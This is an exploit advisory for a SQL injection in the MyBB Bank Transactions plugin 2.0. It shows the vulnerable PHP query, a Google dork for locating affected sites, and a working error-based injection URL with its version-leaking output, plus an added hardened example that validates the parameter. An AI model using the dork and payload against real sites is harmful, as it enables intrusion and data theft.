MyBB Bank Transactions plugin version 2.0 suffers from a remote SQL injection vulnerability.
# Exploit Title: MyBB Bank Transactions Plugin SQL Injection
# Google Dork: inurl:bank.php?transactions=
# Date: 13.12.2012
# Exploit Author: limb0
# Vendor Homepage: http://mods.mybb.com/view/transactions
# Software Link: www.kingofpersia.ir
# Version: 2.0
# Category: Web Security
# Tested on: Linux
================================SQLi==============================
Installation:
1: Download the plugin and copy the files into the right directory.
2: Activate the plugin.
(At this step you may get an error like:
SQL Error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM DEFAULT CHARSET=utf8' at line 7
This is caused by the plugin. Open bank.php from the /inc/plugins directory and delete this part from every query:
"TYPE=MyISAM DEFAULT CHARSET=utf8". When you click Activate again, everything should work.)
------------------------------------------------------------------
The vulnerability is in bank.php: the "transactions" GET parameter is placed into the SQL query unquoted and without any validation.
Vulnerable lines:
$uid=$_GET['transactions'];
$T_ID=1;
$T_ufetch=$db->query("SELECT * FROM ".TABLE_PREFIX."users WHERE uid=$uid ");
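A hardened form of the lines above, as an added example that is not the plugin's or the advisory author's code: the transactions value is accepted only if it is a positive integer, and the query is built from that integer rather than from the request string. The "mybb_" prefix, the function names and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's code. The "mybb_" prefix and the function
// names are assumptions; in MyBB, TABLE_PREFIX is defined by the forum itself.
const TABLE_PREFIX = 'mybb_';

// Pattern from bank.php: the raw parameter becomes part of the SQL text.
function vulnerable_query(string $raw): string
{
    return "SELECT * FROM " . TABLE_PREFIX . "users WHERE uid=$raw ";
}

// Accept only a positive decimal integer. Arrays (?transactions[]=1) and
// strings with trailing SQL are rejected instead of being silently truncated.
function parse_uid($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $uid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $uid === false ? null : $uid;
}

// Build the query from the validated integer, never from the original string.
function hardened_query($raw): ?string
{
    $uid = parse_uid($raw);
    return $uid === null ? null : "SELECT * FROM " . TABLE_PREFIX . "users WHERE uid={$uid}";
}

// Constructed sample inputs; the third is this advisory's example value after URL decoding.
$samples = [
    '1',
    ['1'],
    '1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1--',
    '1abc',
];

foreach ($samples as $raw) {
    echo "input:    " . (is_array($raw) ? 'array' : $raw) . "\n";
    if (is_string($raw)) {
        echo "original: " . vulnerable_query($raw) . "\n";
    }
    echo "hardened: " . (hardened_query($raw) ?? 'rejected') . "\n\n";
}
```

The "Result" shown further down also depends on the raw database error being returned to the visitor, so suppressing SQL error output for unauthenticated users removes that feedback channel but does not fix the query.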
-------------------------------------------------------------------
Instructions:
Go to: /bank.php?transactions=[SQLi]
Example:
/bank.php?transactions=1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--
Result:
1062 - Duplicate entry '5.5.27~1' for key 'group_key'
Proof: http://postimage.org/image/i34m16ejj/